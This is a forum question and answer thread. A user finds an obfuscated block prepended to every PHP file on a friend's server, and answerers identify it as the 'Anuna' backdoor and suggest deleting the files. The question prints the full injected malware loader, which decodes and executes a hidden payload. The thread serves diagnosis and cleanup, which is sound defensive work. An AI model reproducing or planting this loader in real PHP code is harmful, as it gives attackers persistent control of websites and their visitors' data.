Start of all my PHP code infected

Question

I was asked to help update some code for a friend and found their local files to be clean PHP but when I accidentally viewed the source PHP code on their server, all the PHP files started with the following:

<?php  
$okixul = ', $oaqacbv); $czwdrtb();}}-   x24 x5c%j^  x24-    x24tvctutmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]yf`4   x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osv0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:64utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|fqp%!|Z~!<##!>!2p%!|!*!***b%)sfxprd/#00;quui#>.%!<***f    x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdo82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fe"    x6f 142 x5f 163 x74 141 x72 164")!pd%)!gj}Z;h!opjudovg}{;#)t*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA    x27doj%6<   x724-   x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  xgj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QI:*mmvo:>:iuhofm%:-5pt-#w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-1]#-bubE{h%)tpqsut>j%!*72!  x27!hmg%)!gj!<2,*j%-#1]#-bub372]58y]472]37y]672]48y]#>s%<#462]47y]252]1x7f_*#ujojRk3`{666~6<&w6<    x7fw6implode(array_map("tqcvlvt",str_split("%tj%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!)7fmjix6<C    x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]26d#)tutjyf`opjudovg    x22)!985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:5x24-!%   x24-    x24*!|! x24pd%w6Z6<.2`hA    x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<Q&f_UTPI`QUUI&e_SEEB`FUPNF  x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-Uc1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#0#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**24  x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if4-    x24*<!~!    x24/%t2w/   x24)##-!#~<#/%  8]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]8{**u%-#jt0}Z;0]=]0#)22^,%b:<!%c:>%s:   x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!bmgoj{hA!osvufs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%!-#bT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88ASV<*w%)ppde>u%V<#65,418R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**));$czwdrtb = $yvunquf(""S&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&bfmtf!%z>2<!%ww2)%w`TW~  x24<!fwbm)%tjw)b24- x24]26  x24-    x24<%j,,*!| x24-    x24gvodpt}X;`msvd}R;*msv%)}.;`UQPMSV;utpI#7>/7rfs%6<#o]1/20QUUIubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpqj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbo*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#y76#<!%w:!>!(%w:!>!   x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6mjix:<##:>:h%:<#64y]552]e7y]#>n%<#}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbq ((strstr($uas,"   x6d 163 x69 145"))q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%b#<%fdy>#]D4]273]D6P2L5P6]N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#  x24#-!#]y38#-!%w:**<")9#-!#:618d5f9#-!#f6c68399#if((function_exists( && (!isset($GLOBALS["  x61 156 x75 156 x61"])))) { $GLOBALS[" chr(ord($n)-1);} @error_reporting(0); $oaqacbv = ufs!*!+A!>!{e%)!>>  x22!ftmbg)4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-b8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~  xmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   x24/%tmw/!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x7R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,7jsv%7UFH#   x27rfs%6~6< x7fw%!|!*)323zbek!~!<b% x7f!<X>b%Z<#o`57ftbc    x7f!|!*uyfu x27pde:4:|:**#ppde#)tutj2qj%7-K)udfoopdXA   x22)7gj6<*QDU`MPT8y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fpmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)r>#L4]275L3]248L3P6L1M5]D2s)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*XAZk:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#po#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)3sv%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22d}+;!>!} x27;!>>>!}_A7>q%6<  x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6D!-id%)uqpuft`msvd},;uqpuft`msv62  x65 141 x74 145 x5f 146 x75 156<*K)ftpmdXA6|7**197-ssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#27;mnui}&;zepc}A;~!} x7f;!|!}{;)dov{h19275j{hnpd19275fubmgoj{h1:|p3)%cB%iN}#-!   x24/%tmw/   x24)%c*W%eN+#Qi x5V,6<*)ujojR   x27id%6<    x7fw6*   or (strstr($uas,"  x72 166 x3a 61  x31")) or (strstr($uas,"    x61 1w!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc6|7**111127-K)ebfsX  x27u%7]445]212]445]43]321]464]284]364]6]234]342]58]24]31dujpo!  x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2W%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%%b:>1<!fmtf!%b:>%s:    x5c%j:.;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufl]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.fw6*    x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpm56   x64 162 x6f 151 x64"))) { $yvunquf = "  x63 1   x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 12#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;2]},;osvufs}    xE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcv*CW&)7gj6<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6fs:~928>>   x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnp;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22gj}1~!<2p%   x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2px24- x24!>!fyqmpef)# x24*<!%t::!>!   x24Yptmf!~<**9.-j%-bubE{h%)sutcvt)fu6   x63 164 x69 157 x6e"; function tqcvlvt($n){return24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    zcYufhA x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5cq%   x27j#)zbssb!-#}#)fepmqnj!/!#0#)idu!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvu23ldfidk!~!<**qp%!-uyfu%)3of)fepdof^?]_   x5c}X   x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74M4P8]37]278]225]241]334]368]322]3]364y6gP7L6M7]D4]275]D:M8]Df#<%tdz5946-tr.984:75983:48984:71]K9]77]D4]f.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>bn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<`bj+upcotn+qsvmt+fmhpphgj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSarvcaeji';

$efkvsyuxf = explode(chr((758 - 638)), substr($okixul, (29531 - 23605), (220 - 186)));

$bzuaezx = $efkvsyuxf[0]($efkvsyuxf[ (3 - 2) ]);
$ecckncqdnt = $efkvsyuxf[0]($efkvsyuxf[ (8 - 6) ]);
if (!function_exists('pwlggr')) {
    function pwlggr($coqnotxx, $nceoxvnf, $dhigikttik)
    {
        $qfvtkf = null;
        for ($zmovjihc = 0; $zmovjihc < (sizeof($coqnotxx) / 2); $zmovjihc++) {
            $qfvtkf .= substr($nceoxvnf, $coqnotxx[ ($zmovjihc * 2) ], $coqnotxx[ ($zmovjihc * 2) + (3 - 2) ]);
        }
        return $dhigikttik(chr((61 - 52)), chr((602 - 510)), $qfvtkf);
    }

    ;
}
$xxmpwve = explode(chr((159 - 115)),
    '2809,20,439,35,2829,61,4784,59,1559,60,2573,35,4120,64,4737,47,3895,33,5218,51,2890,50,882,42,4184,46,2381,61,5782,39,1185,48,2267,22,2289,54,4274,25,979,42,2146,27,3299,27,3928,21,3403,35,1490,69,2228,39,5335,58,3749,48,2540,33,3817,47,501,53,4679,58,1341,43,1302,39,4092,28,851,31,4959,48,4494,52,2116,30,3864,31,3797,20,5064,41,474,27,189,48,5187,31,1800,53,753,55,4890,69,690,63,2969,58,2173,55,1072,24,5105,42,398,41,3491,53,269,59,5678,47,237,32,3091,41,5821,23,5393,30,5725,57,605,65,1233,26,2002,36,3326,33,3693,56,5479,35,3359,23,3654,39,5881,45,5423,56,5007,57,4017,33,670,20,3382,21,93,58,2940,29,3197,40,3620,34,1903,22,3237,62,1925,52,4843,47,3985,32,5844,37,1733,21,2608,43,5514,61,1021,51,1656,34,1690,43,3438,53,2442,34,808,43,3027,64,5269,66,1162,23,26,26,3569,51,554,51,2077,39,4350,61,1619,37,5147,40,4050,42,1384,38,151,38,2783,26,3132,65,1259,43,4411,56,52,41,4613,66,1096,66,5642,36,328,70,2703,25,5612,30,3544,25,4230,44,2651,52,1853,50,5575,37,4546,67,4299,51,1422,68,2476,64,4467,27,1754,46,924,55,2038,39,3949,36,2343,38,2728,55,1977,25,0,26');
$dgqsxh = $bzuaezx("", pwlggr($xxmpwve, $okixul, $ecckncqdnt));
$bzuaezx = $okixul;
$dgqsxh("");
$dgqsxh = (769 - 648);
$okixul = $dgqsxh - 1;

Does anyone have any idea on what has taken place, or seen this sort of code before? Interestingly the first variable seems to be different on each page but the code is the same.

Answer 1

This is some kind of obfuscated code. That obfuscated code may contain harmful content but you can't understand it. I would rather delete all of the files from my server because of all your data can be seen by 3rd person right now.

As others said before DON'T UPLOAD ANY PHP SCRIPT FROM UNTRUSTED SOURCES.

Answer 2

Does anyone have any idea on what has taken place?

Your server was infected by malicious code.

or have seen it before?

Yes, it's called "Anuna". Personnally I am not quite sure what it does (some kind of backdoor/trojan/worm...). Just Google "PHP Anuna" for more info. You'll also find many StackOverflow questions.

• Hacked site - encrypted code
• Malicious code found in WordPress theme files. What does it do?